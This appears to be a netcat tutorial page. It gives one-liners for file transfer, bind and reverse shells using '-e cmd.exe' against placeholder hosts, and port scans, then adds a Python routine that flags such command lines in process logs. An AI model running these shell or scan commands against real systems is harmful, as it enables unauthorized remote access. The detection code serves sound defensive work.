Content
The -DGAPING_SECURITY_HOLE compile-time option allows an operator to execute programs using the -e switch, which makes a number of powerful tasks possible, including launching a shell.
Transferring data with netcat
On the server:
ncat -v -w 30 -p 31337 -l < secret.txt
The -w switch instructs Netcat to wait the given number of seconds before timing out the connection.
On the client:
ncat -v -w 2 x.x.x.x 31337 > secret.txt
Using Netcat to get a remote shell on a target computer
- Preparing the listener:
ncat -Lp 31337 -vv -e cmd.exe
The -L switch makes the listener persistent: it listens again after a client disconnects (this switch comes from the Windows nc.exe build; Ncat spells it -k / --keep-open).
- Connecting to the target:
ncat x.x.x.x 31337
It does not matter which side is the listener and which side is the client; in the next pair of commands the connecting side is the one that hands out the shell:
ncat -lp 80 # server
ncat x.x.x.x 80 -e cmd.exe # client
Basic port scanning against a target
ncat -v -w 1 x.x.x.x -z 1-1000
-z tells netcat to operate in zero-I/O mode: it only attempts each connection and reports the result, without sending or reading any data, which makes the port scan faster.
Randomized port scanning against a target
ncat -v -r -w 1 x.x.x.x -z 1-1000
-r tells netcat to probe the ports in random order instead of sequentially.
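A defender's view of the switches covered above (-e, -l/-L and -z), as an added example that is not from the original page: a small Python triage routine that classifies netcat-family process-creation events by what the command line asks netcat to do, including clustered switches such as -Lp. The key=value log format and the sample events are constructed for this example; adapt the regex to your own EDR or auditd export.

```python
import re
import shlex

# Netcat binaries and the switches this page covers: -e (execute a program, compiled in
# only with -DGAPING_SECURITY_HOLE), -l/-L (listen), -z (zero-I/O scan); Ncat spellings added.
NETCAT_BINARIES = {"nc", "ncat", "netcat", "nc.exe", "ncat.exe"}
EXEC_FLAGS = {"-e", "--exec", "-c", "--sh-exec", "--lua-exec"}
LISTEN_FLAGS = {"-l", "-L", "-k", "--listen", "--keep-open"}
# Constructed process-creation events in a hypothetical key=value log format.
SAMPLE_EVENTS = [
    'ts=2024-05-01T10:00:01Z host=ws01 user=svc cmd="ncat -Lp 31337 -vv -e cmd.exe"',
    'ts=2024-05-01T10:00:05Z host=ws02 user=bob cmd="ncat 10.0.0.5 80 -e cmd.exe"',
    'ts=2024-05-01T10:01:10Z host=ws03 user=ann cmd="ncat -v -w 1 10.0.0.9 -z 1-1000"',
    'ts=2024-05-01T10:02:00Z host=ws04 user=ann cmd="ncat -v -w 2 10.0.0.5 31337"',
    'ts=2024-05-01T10:03:00Z host=ws05 user=ops cmd="/usr/bin/curl https://example.org"',
]

def expand_short_flags(args):
    """Split clustered short options such as '-Lp' or '-vv' into single flags."""
    out = []
    for a in args:
        if a.startswith("-") and not a.startswith("--") and len(a) > 2:
            out.extend("-" + ch for ch in a[1:])
        else:
            out.append(a.split("=", 1)[0])  # '--exec=/bin/sh' -> '--exec'
    return out

def classify_netcat(cmdline):
    """Return a verdict for one command line, or None if it is not netcat."""
    argv = shlex.split(cmdline) or [""]
    binary = re.split(r"[\\/]", argv[0])[-1].lower()
    if binary not in NETCAT_BINARIES:
        return None
    flags = set(expand_short_flags(argv[1:]))
    execs, listens = bool(flags & EXEC_FLAGS), bool(flags & LISTEN_FLAGS)
    if execs:  # -e present: a program is handed to whoever is on the other end
        return "bind shell" if listens else "reverse shell"
    if "-z" in flags:
        return "port scan"
    return "listener" if listens else "client"

def triage(events):
    """Return (host, verdict) for each netcat event; other processes are skipped."""
    findings = []
    for line in events:
        m = re.search(r'host=(\S+).*?cmd="([^"]*)"', line)
        verdict = classify_netcat(m.group(2)) if m else None
        if verdict:
            findings.append((m.group(1), verdict))
    return findings
```

Any hit with an exec switch is worth an alert on its own; a plain listener or scan verdict is better correlated with the user and host before escalating.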